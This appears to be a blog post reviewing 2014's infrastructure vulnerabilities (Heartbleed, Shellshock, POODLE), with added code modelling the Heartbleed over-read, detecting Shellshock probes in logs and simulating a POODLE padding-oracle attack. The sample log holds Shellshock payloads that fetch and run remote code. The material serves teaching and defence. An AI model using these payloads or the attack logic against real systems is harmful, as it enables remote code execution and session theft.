Last year ended with a bang: a devastating attack against Sony and a lot of finger pointing in the press. The fallout from the breach will not only affect Sony's IT posture; as class action lawsuits pile up, Sony Pictures Entertainment will be dealing with the cleanup for a long time. Individual, high-visibility incidents like this create an awareness spike, but our attention doesn't last. As soon as the press stops talking about it, people return to life as normal and take their computing for granted. As security professionals, we can't afford to be distracted by the headlines. Attacks against systems are an ongoing drumbeat, and it is with that perspective that we looked back at 2014.
The shift to mainstream infrastructure exploits
There was no shortage of headline breaches in the news cycle: major retailers, email service providers, and healthcare institutions all had significant incidents. But looking at the whole picture, something seems to have shifted last year. There were several attacks against the foundation of the Internet that may be a harbinger of things to come. With that perspective, I consider 2014 to be the year that attacks shifted to mainstream infrastructure exploits.
In order to connect to the Internet, or to use the Internet to deliver services, the world relies on a common set of building blocks: not the applications themselves, but the shared libraries, shells and protocol implementations a few layers below them. When those building blocks are compromised, everybody becomes vulnerable, even users who are doing the right thing by locking down all the right stuff.
The suggestion that shared infrastructure is the new target isn't scientific. In doing the year in review, I looked at many sources of exploit timelines and high-volume attack reports. But the one that made the lightbulb go off was the US-CERT current activity site. If you thumb back to page 50, you'll start in January 2014.
Looking at the year holistically, it's a shocker. Multiple vulnerabilities were disclosed, and patches announced, for literally every OS, every browser, every rich media player, and every mobile platform. And don't forget Java! I guess we've come to expect this: the ongoing drumbeat of vulnerabilities and patches. But the stuff below the surface is even scarier.
It got even worse
The first hints that something was changing came in February, when RSA executive chairman Art Coviello publicly addressed reports that a random number generator shipped as the default in RSA's BSAFE libraries, Dual_EC_DRBG, was suspected of containing a backdoor: anyone who knew the secret relationship behind its constants could predict its output. Random numbers are the basis of cryptographic keys, so with this shot across the bow it became clear that all of our data, even that which we thought was secure, was potentially exposed.
The problems with underlying cryptographic components didn't end there. In April, Heartbleed (CVE-2014-0160) was disclosed: a missing bounds check in OpenSSL's TLS heartbeat extension let any remote party, with no authentication, read up to 64 KB of a peer's process memory per request, which in practice could include private keys, session cookies and passwords. OpenSSL is the de facto standard implementation of SSL/TLS, used to encrypt a large share of Internet traffic, so once again everyone's data was potentially exposed.
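As an added illustration, not code from the original post or from OpenSSL, the following Python model captures the shape of the Heartbleed bug: a heartbeat request carries its own claimed payload length, the vulnerable handler trusts it and copies that many bytes from wherever the record sits in memory, and the fixed handler rejects any claimed length that does not fit inside the record it actually received. The "memory that happens to follow the record" is a constructed stand-in for the process heap.

```python
import struct

# Constructed stand-in for whatever happened to sit after the record on the heap:
# a correct implementation must never return this, whatever the request claims.
HEAP_NEIGHBOUR = b"session=deadbeef-cookie; Authorization: Basic YWRtaW46aHVudGVyMg=="

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # minimum padding a heartbeat message must carry


def build_heartbeat_request(payload: bytes, claimed_length: int) -> bytes:
    """Heartbeat message body: type(1) | payload_length(2) | payload | padding(16).
    `claimed_length` is written as-is so an attacker can lie about len(payload)."""
    return struct.pack("!BH", HB_REQUEST, claimed_length) + payload + b"\x00" * PADDING


def vulnerable_heartbeat_response(record: bytes, memory_after: bytes) -> bytes:
    """Pre-1.0.1g behaviour: copy `claimed` bytes starting at the payload,
    reading past the end of the record into neighbouring memory if asked to."""
    _, claimed = struct.unpack("!BH", record[:3])
    heap = record + memory_after            # model of the record's surroundings in memory
    payload = heap[3:3 + claimed]           # over-read when claimed > len(record) - 19
    return struct.pack("!BH", HB_RESPONSE, claimed) + payload + b"\x00" * PADDING


def fixed_heartbeat_response(record: bytes, memory_after: bytes):
    """1.0.1g behaviour: the claimed payload plus header and padding must fit in the
    received record, otherwise the message is silently discarded (returns None)."""
    if len(record) < 1 + 2 + PADDING:
        return None
    _, claimed = struct.unpack("!BH", record[:3])
    if 1 + 2 + claimed + PADDING > len(record):
        return None
    payload = record[3:3 + claimed]         # can no longer reach memory_after
    return struct.pack("!BH", HB_RESPONSE, claimed) + payload + b"\x00" * PADDING


def demo() -> dict:
    honest = build_heartbeat_request(b"ping", 4)
    malicious = build_heartbeat_request(b"ping", 200)   # says 200 bytes, sends 4
    return {
        "honest_same": vulnerable_heartbeat_response(honest, HEAP_NEIGHBOUR)
                       == fixed_heartbeat_response(honest, HEAP_NEIGHBOUR),
        "vulnerable_leaks": HEAP_NEIGHBOUR in vulnerable_heartbeat_response(malicious, HEAP_NEIGHBOUR),
        "fixed_drops": fixed_heartbeat_response(malicious, HEAP_NEIGHBOUR) is None,
    }
```

The real bug lived in C, where the over-read walked the actual heap rather than a bytes object, but the check that closed it is exactly the one in `fixed_heartbeat_response`: compare the attacker-supplied length against the length of the record you actually received before copying anything.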
SSL got a brief respite, but in September Shellshock (CVE-2014-6271) hit the press. Bash is the default command shell on most Linux systems and on many other Internet-facing hosts. Shellshock is the name given to a bug in the way Bash imported function definitions from environment variables: any commands appended after the function body were executed as soon as the shell started. Any service that passes attacker-controlled input into the environment of a Bash process, classically CGI scripts on web servers, which export HTTP headers as environment variables, could therefore be made to run arbitrary commands: manipulate users and permissions, inject or exfiltrate data, pivot to other systems, and more. Interestingly, the bug dated back to code shipped in 1989.
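Because every Shellshock payload has to start with the function-definition prefix `() {` that Bash looked for, the probes were easy to spot in web server logs once you knew what to look for. Here is an added example, not part of the original post, of that detection over Apache/nginx combined-format access logs. The log lines are constructed for the example and use RFC 5737 documentation addresses; the attack strings follow the widely published test patterns.

```python
import re

# Apache/nginx "combined" log format: ip ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The exported-function prefix Bash recognised; whitespace between "()" and "{" is optional.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample log (not from a real server). Lines 1, 3 and 4 carry probes:
# two in User-Agent, one in Referer, all aimed at CGI endpoints.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.9/x -O /tmp/x; sh /tmp/x'"
198.51.100.7 - - [25/Sep/2014:10:12:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:10:12:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { _; } >_[$($())] { echo; /usr/bin/id; }" "curl/7.35.0"
203.0.113.77 - - [25/Sep/2014:10:13:44 +0000] "GET /cgi-bin/printenv HTTP/1.1" 500 0 "-" "() {:;}; ping -c 1 203.0.113.9"
"""


def parse_combined(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shellshock_hits(log_text: str) -> list:
    """Return one record per line whose request, Referer or User-Agent carries the
    Shellshock prefix, naming which fields matched and whether a CGI path was targeted."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        fields = sorted(f for f in ("req", "referer", "ua") if SHELLSHOCK_RE.search(rec[f]))
        if not fields:
            continue
        parts = rec["req"].split()
        path = parts[1] if len(parts) > 1 else rec["req"]
        hits.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "path": path,
            "cgi": "/cgi-bin/" in path,
            "fields": fields,
        })
    return hits
```

Headers such as Cookie or custom headers never appear in the combined log, so this catches only probes carried in fields that are logged; for full coverage the same regex would need to run on a capture or a WAF that sees every request header.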
Before Shellshock died down, SSL was in the news again with POODLE (CVE-2014-3566). POODLE is an attack on SSL 3.0 specifically: an attacker on the network path forces a client and server to fall back from TLS to SSL 3.0, then exploits the protocol's loose check of CBC padding to decrypt a chosen byte of an encrypted record in roughly 256 attempts. Aimed at a browser session, that is enough to recover session cookies and similar HTTP tokens, with which a clever attacker could masquerade as the user and cause more damage.
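To make the "loose padding check" concrete, here is an added simulation of the POODLE decryption step, not code from the original post or from any SSL library. It builds a CBC record the way SSL 3.0 does (data, MAC, then padding whose only specified byte is the last one), has the victim re-send the same request under fresh IVs, and lets the attacker swap the all-padding final block for a target block: the server accepts the record exactly when the target's last byte lines up with the padding length, which leaks that byte. The same code with the TLS 1.0 rule (every padding byte must equal the length) never accepts. The block cipher is a toy SHA-256 Feistel network standing in for AES so the example needs only the standard library, the cookie value and request layout are constructed, and the downgrade that precedes this step in a real attack is not modelled.

```python
import hashlib
import hmac
import os

BLOCK, MAC_LEN = 16, 16   # AES-sized blocks, truncated HMAC; example sizes, not a real suite

# Toy 16-byte block cipher: 8-round SHA-256 Feistel network. Only its invertibility matters.
def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_crypt(key, block, rounds):
    left, right = block[:8], block[8:]
    for rnd in rounds:                    # range(8) encrypts, reversed(range(8)) decrypts
        left, right = right, _xor(left, _f(key, rnd, right))
    return right + left

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_crypt(key, _xor(pt[i:i + BLOCK], prev), range(8))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_crypt(key, ct[i:i + BLOCK], reversed(range(8))), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def mac(mac_key, data):
    return hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]

def seal(key, mac_key, iv, data):
    """Encrypt data || MAC || padding; padding is pad_len+1 bytes ending in pad_len."""
    body = data + mac(mac_key, data)
    pad_len = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    return cbc_encrypt(key, iv, body + bytes([pad_len]) * (pad_len + 1))

def record_ok(key, mac_key, iv, ct, check_all_padding_bytes):
    """Receiver side. SSL 3.0 inspects only the final byte; TLS 1.0 additionally
    requires every padding byte to equal pad_len, which is what defeats POODLE."""
    pt = cbc_decrypt(key, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    if check_all_padding_bytes and any(b != pad_len for b in pt[-pad_len - 1:-1]):
        return False
    body = pt[:len(pt) - pad_len - 1]
    return len(body) >= MAC_LEN and hmac.compare_digest(mac(mac_key, body[:-MAC_LEN]), body[-MAC_LEN:])

SECRET_COOKIE = b"auth=7c2e9f"          # constructed: the value the attacker is after
HEADER, TAIL = b"\r\nCookie: ", b"\r\n\r\n"

def attack_request(k):
    """Attacker (e.g. via injected JavaScript) pads path and body so that cookie byte k is
    the last byte of some block and the record's final block is entirely padding."""
    prefix = (BLOCK - 1 - len(HEADER) - k) % BLOCK
    suffix = (-(prefix + len(HEADER) + len(SECRET_COOKIE) + len(TAIL) + MAC_LEN)) % BLOCK
    req = b"A" * prefix + HEADER + SECRET_COOKIE + TAIL + b"B" * suffix
    pos = prefix + len(HEADER) + k
    assert req[pos] == SECRET_COOKIE[k] and pos % BLOCK == BLOCK - 1
    return req, pos // BLOCK + 1         # 1-based index of the block holding byte k

def poodle_recover_byte(key, mac_key, req, target_block, check_all_padding_bytes, max_tries=20000):
    """Victim re-sends req under a fresh IV each try; attacker replaces the final block
    with the target block. Acceptance means D(C_t) ^ C_{n-1} ends in BLOCK-1."""
    for _ in range(max_tries):
        iv = os.urandom(BLOCK)
        ct = seal(key, mac_key, iv, req)
        blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]   # C_0 = IV
        tampered = b"".join(blocks[1:-1] + [blocks[target_block]])
        if record_ok(key, mac_key, iv, tampered, check_all_padding_bytes):
            return (BLOCK - 1) ^ blocks[-2][-1] ^ blocks[target_block - 1][-1]  # P_t = D(C_t) ^ C_{t-1}
    return None

def poodle_recover_cookie(key, mac_key, check_all_padding_bytes, max_tries=20000):
    out = bytearray()
    for k in range(len(SECRET_COOKIE)):
        req, target = attack_request(k)
        byte = poodle_recover_byte(key, mac_key, req, target, check_all_padding_bytes, max_tries)
        if byte is None:
            return None
        out.append(byte)
    return bytes(out)
```

Each accepted record costs about 256 victim requests, and the attacker shifts the request by one byte per cookie byte, which is why the published attack needs a few hundred requests per byte and a way to make the browser repeat them. Nothing here is specific to the toy cipher: the oracle comes from the padding rule, not from the block cipher.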
Security is a process
These are just highlights, but they represent attacks that affect everyone and everything connected to the Internet. Attacks against infrastructure aren't new, but last year's events seem, to me anyway, to suggest a change in the tide. They were all mainstream revelations and had mainstream impact on our data.
As users, there is very little we can do about these vulnerabilities; they affect systems outside our control. That means we can do all the right things (not click links in email, not type passwords into untrusted web forms, not render PDF files in the browser) and still be at risk. When these building blocks are compromised, everyone is affected.
Security professionals have understood this since the early days. Security is not an end point, it is a process. Short of being aware of this (or disconnecting from the Internet), I guess we have to be prepared for more.